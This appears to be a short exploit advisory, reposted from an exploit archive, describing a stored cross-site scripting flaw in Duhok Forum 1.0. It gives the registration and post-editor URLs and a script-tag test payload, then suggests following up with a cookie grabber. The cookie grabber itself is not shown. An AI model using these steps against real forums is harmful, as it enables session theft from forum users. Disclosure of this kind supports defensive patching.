Duhok Forum 1.0 XSS Vulnerability on Register and Post Edito
=========================================================
Duhok Forum 1.0 script Cross Site Scripting Vulnerability
=========================================================
========================================================================================
| # Title : Duhok Forum 1.0 script Cross Site Scripting Vulnerability
| # Author : indoushka
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : XSS
====================== Exploit By indoushka =================================
# Exploit :
1 - http://127.0.0.1/st/index.php?mode=register&Approval=1 (1 register in to the web site)
2 - http://127.0.0.1/st/index.php?mode=editor&method=topic&f=1&c=1 (2 past a new post )
Put this code 4 virified is infected or not <ScRiPt>alert(213771818860)</ScRiPt> a test post
3- if it infected post a new post and use cookie Graber
# 0day.today [2018-01-11] #
Transform Your Security Services
Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.
Book a live demo